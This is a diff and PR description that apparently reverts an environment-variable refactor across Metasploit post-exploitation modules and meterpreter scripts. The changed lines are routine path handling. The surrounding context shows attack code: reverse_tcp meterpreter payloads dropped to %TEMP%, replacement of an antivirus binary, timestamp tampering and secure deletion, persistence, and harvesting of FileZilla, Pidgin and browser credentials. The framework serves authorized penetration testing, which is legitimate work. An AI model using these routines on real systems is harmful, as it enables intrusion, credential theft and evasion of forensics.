@@ -76,16 +76,16 @@ class Metasploit3 < Msf::Post
     url = datastore["URL"]
     filename = datastore["FILENAME"] || url.split('/').last
 
-    path = datastore['DOWNLOAD_PATH']
-    if path.blank?
-      path = session.sys.config.getenv('TEMP')
+    download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"])
+    if download_path.nil? or download_path.empty?
+      path = session.fs.file.expand_path("%TEMP%")
     else
-      path = session.fs.file.expand_path(path)
+      path = download_path
     end
 
     outpath = path + '\\' + filename
     exec = datastore['EXECUTE']
-    exec_string = datastore['EXEC_STRING']
+    exec_string = datastore['EXEC_STRING'] || ''
     output = datastore['OUTPUT']
     remove = datastore['DELETE']
 
@@ -108,7 +108,11 @@ class Metasploit3 < Msf::Post
     # Execute file upon request
     if exec
       begin
-        cmd = "\"#{outpath}\" #{exec_string}"
+        cmd = "#{outpath} #{exec_string}"
+
+        # If we don't have the following gsub, we get this error in Windows:
+        # "Operation failed: The system cannot find the file specified"
+        cmd = cmd.gsub(/\\/, '\\\\\\').gsub(/\s/, '\ ')
 
         print_status("Executing file: #{cmd}")
         res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])

--- a/modules/post/windows/manage/ie_proxypac.rb
+++ b/modules/post/windows/manage/ie_proxypac.rb
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post
   end
 
   def create_pac(local_pac)
-    pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
+    pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
     conf_pac = ""
 
     if ::File.exists?(local_pac)

--- a/modules/post/windows/manage/payload_inject.rb
+++ b/modules/post/windows/manage/payload_inject.rb
@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
   # Creates a temp notepad.exe to inject payload in to given the payload
   # Returns process PID
   def create_temp_proc(pay)
-    windir = client.sys.config.getenv('windir')
+    windir = client.fs.file.expand_path("%windir%")
     # Select path of executable to run depending the architecture
     if pay.arch.join == "x86" and client.platform =~ /x86/
       cmd = "#{windir}\\System32\\notepad.exe"

--- a/modules/post/windows/manage/rpcapd_start.rb
+++ b/modules/post/windows/manage/rpcapd_start.rb
@@ -46,8 +46,7 @@ class Metasploit3 < Msf::Post
       else
         print_status("Rpcap service found: #{serv['Name']}")
         reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
-        # TODO: check if this works on x64
-        prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"
+        prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
         if reg != 2
           print_status("Setting rpcapd as 'auto' service")
           service_change_startup("rpcapd","auto")

--- a/modules/post/windows/manage/run_as.rb
+++ b/modules/post/windows/manage/run_as.rb
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post
     end
 
     # set profile paths
-    sysdrive = session.sys.config.getenv('SYSTEMDRIVE')
+    sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%")
     os = @host_info['OS']
     profiles_path = sysdrive + "\\Documents and Settings\\"
     profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/

--- a/modules/post/windows/manage/sdel.rb
+++ b/modules/post/windows/manage/sdel.rb
@@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post
 
   #Function to calculate the size of the cluster
   def size_cluster()
-    drive =  session.sys.config.getenv('SystemDrive')
-    r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
+    drive =  expand_path("%SystemDrive%")
+    r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
     cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
     print_status("Cluster Size: #{cluster}")
 
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
 
   #Function to calculate the real file size on disk (file size + slack space)
   def size_on_disk(file)
-    size_file = session.fs.file.stat(file).size;
+    size_file = client.fs.file.stat(file).size;
     print_status("Size of the file: #{size_file}")
 
     if (size_file<800)
@@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post
     rsec=  Rex::Text.rand_text_numeric(7,bad='012')
     date = Time.now - rsec.to_i
     print_status("Changing MACE attributes")
-    session.priv.fs.set_file_mace(file, date,date,date,date)
+    client.priv.fs.set_file_mace(file, date,date,date,date)
   end
 
   #Function to overwrite the file
   def file_overwrite(file,type,n)
     #FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
-    r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
+    r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
     handle=r['return']
     real_size=size_on_disk(file)
 
@@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post
       end
 
       #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
-      session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
+      client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
 
       #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
-      w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
+      w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
 
       if w['return']==false
         print_error("The was an error writing to disk, check permissions")
@@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
       print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
     end
 
-    session.railgun.kernel32.CloseHandle(handle)
+    client.railgun.kernel32.CloseHandle(handle)
     change_mace(file)
 
     #Generate a long random file name before delete it
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
     print_status("Changing file name")
 
     #http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
-    session.railgun.kernel32.MoveFileA(file,newname)
+    client.railgun.kernel32.MoveFileA(file,newname)
 
     file_rm(newname)
     print_good("File erased!")
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post
   #Check if the file is encrypted or compressed
   def comp_encr(file)
     #http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
-    handle=session.railgun.kernel32.GetFileAttributesA(file)
+    handle=client.railgun.kernel32.GetFileAttributesA(file)
     type= handle['return']
 
     #FILE_ATTRIBUTE_COMPRESSED=0x800

--- a/scripts/meterpreter/dumplinks.rb
+++ b/scripts/meterpreter/dumplinks.rb
@@ -61,7 +61,7 @@ def enum_users(os)
   user = @client.sys.config.getuid
   userpath = nil
   useroffcpath = nil
-  sysdrv = @client.sys.config.getenv('SystemDrive')
+  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
   if os =~ /Windows 7|Vista|2008/
     userpath = sysdrv + "\\Users\\"
     lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@@ -83,7 +83,7 @@ def enum_users(os)
       users << userinfo
     end
   else
-    uservar = @client.sys.config.getenv('USERNAME')
+    uservar = @client.fs.file.expand_path("%USERNAME%")
     userinfo['username'] = uservar
     userinfo['userpath'] = userpath + uservar + lnkpath
     userinfo['useroffcpath'] = userpath + uservar + officelnkpath

--- a/scripts/meterpreter/duplicate.rb
+++ b/scripts/meterpreter/duplicate.rb
@@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/
     #
     # Upload to the filesystem
     #
-    tempdir = client.sys.config.getenv('TEMP')
+    tempdir = client.fs.file.expand_path("%TEMP%")
     tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
     tempexe.gsub!("\\\\", "\\")
 

--- a/scripts/meterpreter/enum_chrome.rb
+++ b/scripts/meterpreter/enum_chrome.rb
@@ -195,7 +195,7 @@ host = session.session_host
 @log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
 ::FileUtils.mkdir_p(@log_dir)
 
-sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
+sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%")
 os = @host_info['OS']
 if os =~ /(Windows 7|2008|Vista)/
   @profiles_path = sysdrive + "\\Users\\"
@@ -218,7 +218,7 @@ if is_system?
   print_status "users found: #{usernames.join(", ")}"
 else
   print_status "running as user '#{uid}'..."
-  usernames << client.sys.config.getenv('USERNAME')
+  usernames << client.fs.file.expand_path("%USERNAME%")
   prepare_railgun
 end
 

--- a/scripts/meterpreter/enum_firefox.rb
+++ b/scripts/meterpreter/enum_firefox.rb
@@ -251,9 +251,8 @@ if client.platform =~ /win32|win64/
   if frfxchk
     user = @client.sys.config.getuid
     if not is_system?
-      envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
-      usrname = envs['USERNAME']
-      db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
+      usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
+      db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
       if kill_frfx
         kill_firefox
       end

--- a/scripts/meterpreter/enum_powershell_env.rb
+++ b/scripts/meterpreter/enum_powershell_env.rb
@@ -22,7 +22,7 @@ def enum_users
   users = []
   user = @client.sys.config.getuid
   path4users = ""
-  sysdrv = @client.sys.config.getenv('SystemDrive')
+  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
 
   if os =~ /Windows 7|Vista|2008/
     path4users = sysdrv + "\\Users\\"
@@ -43,7 +43,7 @@ def enum_users
     end
   else
     userinfo = {}
-    uservar = @client.sys.config.getenv('USERNAME')
+    uservar = @client.fs.file.expand_path("%USERNAME%")
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + profilepath
     users << userinfo
@@ -83,7 +83,7 @@ def enum_powershell
     end
     if powershell_version =~ /2./
       print_status("Powershell Modules:")
-      powershell_module_path = @client.sys.config.getenv('PSModulePath')
+      powershell_module_path = @client.fs.file.expand_path("%PSModulePath%")
       @client.fs.dir.foreach(powershell_module_path) do |m|
         next if m =~ /^(\.|\.\.)$/
         print_status("\t#{m}")

--- a/scripts/meterpreter/enum_vmware.rb
+++ b/scripts/meterpreter/enum_vmware.rb
@@ -223,7 +223,7 @@ def enum_users
   users = []
   user = @client.sys.config.getuid
   path4users = ""
-  sysdrv = @client.sys.config.getenv('SystemDrive')
+  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
 
   if os =~ /7|Vista|2008/
     path4users = sysdrv + "\\users\\"
@@ -244,7 +244,7 @@ def enum_users
     end
   else
     userinfo = {}
-    uservar = @client.sys.config.getenv('USERNAME')
+    uservar = @client.fs.file.expand_path("%USERNAME%")
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + profilepath
     users << userinfo

--- a/scripts/meterpreter/get_env.rb
+++ b/scripts/meterpreter/get_env.rb
@@ -18,11 +18,12 @@ def list_env_vars(var_names)
           "Name",
           "Value"
         ])
-  @client.sys.config.getenvs(*var_names.flatten).each do |k, v|
-    tbl << [k, v]
+  var_names.flatten.each do |v|
+    tbl << [v,@client.fs.file.expand_path("\%#{v}\%")]
   end
   print("\n" + tbl.to_s + "\n")
 end
+
 
 opts.parse(args) { |opt, idx, val|
   case opt

--- a/scripts/meterpreter/get_filezilla_creds.rb
+++ b/scripts/meterpreter/get_filezilla_creds.rb
@@ -114,7 +114,7 @@ def enum_users(os)
   users = []
 
   path4users = ""
-  sysdrv = @client.sys.config.getenv('SystemDrive')
+  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
 
   if os =~ /7|Vista|2008/
     path4users = sysdrv + "\\users\\"
@@ -135,7 +135,7 @@ def enum_users(os)
     end
   else
     userinfo = {}
-    uservar = @client.sys.config.getenv('USERNAME')
+    uservar = @client.fs.file.expand_path("%USERNAME%")
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + path2purple
     users << userinfo

--- a/scripts/meterpreter/get_pidgin_creds.rb
+++ b/scripts/meterpreter/get_pidgin_creds.rb
@@ -145,7 +145,7 @@ def enum_users(os)
   users = []
 
   path4users = ""
-  sysdrv = @client.sys.config.getenv('SystemDrive')
+  sysdrv = @client.fs.file.expand_path("%SystemDrive%")
 
   if os =~ /Windows 7|Vista|2008/
     path4users = sysdrv + "\\users\\"
@@ -166,7 +166,7 @@ def enum_users(os)
     end
   else
     userinfo = {}
-    uservar = @client.sys.config.getenv('USERNAME')
+    uservar = @client.fs.file.expand_path("%USERNAME%")
     userinfo['username'] = uservar
     userinfo['userappdata'] = path4users + uservar + path2purple
     users << userinfo

--- a/scripts/meterpreter/getcountermeasure.rb
+++ b/scripts/meterpreter/getcountermeasure.rb
@@ -301,7 +301,7 @@ def checkdep(session)
   tmpout = ""
   depmode = ""
   # Expand environment %TEMP% variable
-  tmp = session.sys.config.getenv('TEMP')
+  tmp = session.fs.file.expand_path("%TEMP%")
   # Create random name for the wmic output
   wmicfile = sprintf("%.5d",rand(100000))
   wmicout = "#{tmp}\\#{wmicfile}"

--- a/scripts/meterpreter/hostsedit.rb
+++ b/scripts/meterpreter/hostsedit.rb
@@ -30,7 +30,7 @@ end
 
 record = ""
 #Set path to the hosts file
-hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"
+hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
 #Function check if UAC is enabled
 def checkuac(session)
   winver = session.sys.config.sysinfo

--- a/scripts/meterpreter/panda_2007_pavsrv51.rb
+++ b/scripts/meterpreter/panda_2007_pavsrv51.rb
@@ -69,15 +69,16 @@ elsif client.platform =~ /win32|win64/
       exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 
       # Change to our working directory.
-      workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
-      client.fs.dir.chdir(workindir)
+      workingdir = client.fs.file.expand_path("%ProgramFiles%")
+      client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
 
       # Create a backup of the original exe.
       print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
       client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
 
       # Place our newly created exe with the orginal binary name.
-      tempexe = workingdir + "PAVSRV51.EXE"
+      tempdir = client.fs.file.expand_path("%ProgramFiles%")
+      tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
 
       print_status("Sending EXE payload '#{tempexe}'.")
       fd = client.fs.file.new(tempexe, "wb")

--- a/scripts/meterpreter/persistence.rb
+++ b/scripts/meterpreter/persistence.rb
@@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs)
   if target_dir
     tempdir = target_dir
   else
-    tempdir = @client.sys.config.getenv('TEMP')
+    tempdir = @client.fs.file.expand_path("%TEMP%")
   end
   tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
   fd = @client.fs.file.new(tempvbs, "wb")

--- a/scripts/meterpreter/pml_driver_config.rb
+++ b/scripts/meterpreter/pml_driver_config.rb
@@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/
       exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 
       # Place our newly created exe in %TEMP%
-      tempdir = client.sys.config.getenv('TEMP')
+      tempdir = client.fs.file.expand_path("%TEMP%")
       tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
       print_status("Sending EXE payload '#{tempexe}'.")
       fd = client.fs.file.new(tempexe, "wb")

--- a/scripts/meterpreter/prefetchtool.rb
+++ b/scripts/meterpreter/prefetchtool.rb
@@ -19,7 +19,7 @@ require 'digest/sha1'
   "-l" => [ false,  "Download Prefetch Folder Analysis Log"]
 )
 
-@tempdir = @session.sys.config.getenv('TEMP')
+@tempdir = @session.fs.file.expand_path("%TEMP%")
 
 #---------------------------------------------------------------------------------------------------------
 def read_program_list

--- a/scripts/meterpreter/remotewinenum.rb
+++ b/scripts/meterpreter/remotewinenum.rb
@@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt)
   runfail = 0
   runningas = session.sys.config.getuid
   begin
-    tmp = session.sys.config.getenv('TEMP')
+    tmp = session.fs.file.expand_path("%TEMP%")
     # Temporary file on windows host to store results
     wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
 

--- a/scripts/meterpreter/scheduleme.rb
+++ b/scripts/meterpreter/scheduleme.rb
@@ -179,7 +179,7 @@ end
 #---------------------------------------------------------------------------------------------------------
 
 def upload(session,file)
-  location = session.sys.config.getenv('TEMP')
+  location = session.fs.file.expand_path("%TEMP%")
   fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
   print_status("Uploading #{file}....")
   session.fs.file.upload_file("#{fileontrgt}","#{file}")

--- a/scripts/meterpreter/schelevator.rb
+++ b/scripts/meterpreter/schelevator.rb
@@ -99,10 +99,6 @@ upload_fn = nil
   end
 }
 
-envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
-sysdir = envs['SystemRoot']
-tmpdir = envs['TEMP']
-
 # Must have at least one of -c or -u
 if not cmd and not upload_fn
   print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
@@ -114,8 +110,9 @@ if not cmd and not upload_fn
   raw  = pay.generate
   exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
   #and placing it on the target in %TEMP%
+  tempdir = client.fs.file.expand_path("%TEMP%")
   tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
-  cmd = tmpdir + "\\" + tempexename + ".exe"
+  cmd = tempdir + "\\" + tempexename + ".exe"
   print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
   fd = client.fs.file.new(cmd, "wb")
   fd.write(exe)
@@ -142,6 +139,8 @@ end
 #
 # Upload the payload command if needed
 #
+sysdir = session.fs.file.expand_path("%SystemRoot%")
+tmpdir = session.fs.file.expand_path("%TEMP%")
 if upload_fn
   begin
     location = tmpdir.dup

--- a/scripts/meterpreter/scraper.rb
+++ b/scripts/meterpreter/scraper.rb
@@ -73,7 +73,7 @@ logs = ::File.join(Msf::Config.log_directory, 'scripts','scraper', host + "_" + 
 unsupported if client.platform !~ /win32|win64/i
 begin
 
-  tmp = client.sys.config.getenv('TEMP')
+  tmp = client.fs.file.expand_path("%TEMP%")
 
   print_status("Gathering basic system information...")
 

--- a/scripts/meterpreter/service_permissions_escalate.rb
+++ b/scripts/meterpreter/service_permissions_escalate.rb
@@ -51,10 +51,6 @@ opts.parse(args) do |opt, idx, val|
   end
 end
 
-envs = client.sys.config.getenvs('TEMP', 'SYSTEMROOT')
-tempdir = envs['TEMP']
-sysdir = envs['SYSTEMROOT']
-
 # Get the exe payload.
 pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
 pay.datastore['LHOST'] = rhost
@@ -62,8 +58,9 @@ pay.datastore['LPORT'] = rport
 raw  = pay.generate
 exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 #and placing it on the target in %TEMP%
+tempdir = client.fs.file.expand_path("%TEMP%")
 tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
-tempexe = "#{tempdir}\\#{tempexename}.exe"
+tempexe = tempdir + "\\" + tempexename + ".exe"
 print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
 fd = client.fs.file.new(tempexe, "wb")
 fd.write(exe)
@@ -132,7 +129,7 @@ service_list.each do |serv|
     moved = false
     configed = false
     #default path, but there should be an ImagePath registry key
-    source = "#{sysdir}\\system32\\#{serv}.exe")
+    source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
     #get path to exe; parse out quotes and arguments
     sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
     sourcemaybe = client.fs.file.expand_path(sourceorig)

--- a/scripts/meterpreter/srt_webdrive_priv.rb
+++ b/scripts/meterpreter/srt_webdrive_priv.rb
@@ -87,7 +87,7 @@ client.sys.process.get_processes().each do |m|
     exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 
     # Place our newly created exe in %TEMP%
-    tempdir = client.sys.config.getenv('TEMP')
+    tempdir = client.fs.file.expand_path("%TEMP%")
     tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
     print_status("Sending EXE payload '#{tempexe}'.")
     fd = client.fs.file.new(tempexe, "wb")

--- a/scripts/meterpreter/uploadexec.rb
+++ b/scripts/meterpreter/uploadexec.rb
@@ -23,7 +23,7 @@ def upload(session,file,trgloc = "")
     raise "File to Upload does not exists!"
   else
     if trgloc == ""
-    location = session.sys.config.getenv('TEMP')
+    location = session.fs.file.expand_path("%TEMP%")
     else
       location = trgloc
     end

--- a/scripts/meterpreter/virusscan_bypass.rb
+++ b/scripts/meterpreter/virusscan_bypass.rb
@@ -32,7 +32,7 @@ def upload(session,file,trgloc)
   if not ::File.exists?(file)
     raise "File to Upload does not exists!"
   else
-    @location = session.sys.config.getenv('TEMP')
+    @location = session.fs.file.expand_path("%TEMP%")
     begin
       ext = file.scan(/\S*(.exe)/i)
       if ext.join == ".exe"

--- a/scripts/meterpreter/vnc.rb
+++ b/scripts/meterpreter/vnc.rb
@@ -152,7 +152,7 @@ else
   #
   # Upload to the filesystem
   #
-  tempdir = client.sys.config.getenv('TEMP')
+  tempdir = client.fs.file.expand_path("%TEMP%")
   tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
   tempexe.gsub!("\\\\", "\\")
 

--- a/scripts/meterpreter/win32-sshclient.rb
+++ b/scripts/meterpreter/win32-sshclient.rb
@@ -87,7 +87,7 @@ def upload(client,file,trgloc = nil)
     raise "File to Upload does not exists!"
   else
     if trgloc == nil
-      location = client.sys.config.getenv('TEMP')
+      location = client.fs.file.expand_path("%TEMP%")
     else
       location = trgloc
     end

--- a/scripts/meterpreter/winenum.rb
+++ b/scripts/meterpreter/winenum.rb
@@ -264,7 +264,7 @@ def wmicexec(wmiccmds= nil)
   @client.response_timeout=120
 
   begin
-    tmp = @client.sys.config.getenv('TEMP')
+    tmp = @client.fs.file.expand_path("%TEMP%")
 
     wmiccmds.each do |wmi|
       if i < 10
@@ -409,7 +409,7 @@ end
 def chmace(cmds)
   windir = ''
   print_status("Changing Access Time, Modified Time and Created Time of Files Used")
-  windir = @client.sys.config.getenv('WinDir')
+  windir = @client.fs.file.expand_path("%WinDir%")
   cmds.each do |c|
     begin
       @client.core.use("priv")
@@ -430,7 +430,7 @@ def regdump(pathoflogs,filename)
   #This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
   garbage = ''
   hives = %w{HKCU HKLM HKCC HKCR HKU}
-  windir = @client.sys.config.getenv('WinDir')
+  windir = @client.fs.file.expand_path("%WinDir%")
   print_status('Dumping and Downloading the Registry')
   hives.each do |hive|
     begin

--- a/scripts/meterpreter/wmic.rb
+++ b/scripts/meterpreter/wmic.rb
@@ -22,7 +22,7 @@ def wmicexec(session,wmiccmds= nil)
   tmpout = ''
   session.response_timeout=120
   begin
-    tmp = session.sys.config.getenv('TEMP')
+    tmp = session.fs.file.expand_path("%TEMP%")
     wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
     wmiccmds.each do |wmi|
       print_status "running command wmic #{wmi}"


### PR DESCRIPTION
PR #2782 introduced some nonzero number of problems with shipping modules, so if #3129 is not to your liking, then please land this PR instead.

Fixing this again means reverting this revert -- it shouldn't be too complicated, though, since all the changes are in modules and meterpreter scripts.

This reverts commit d27264b40257b47b64cd8abf82b0c18369faa2cf, reversing changes made to a93265d5e9b05b1e4e0d495c7e867adaccaf7072.
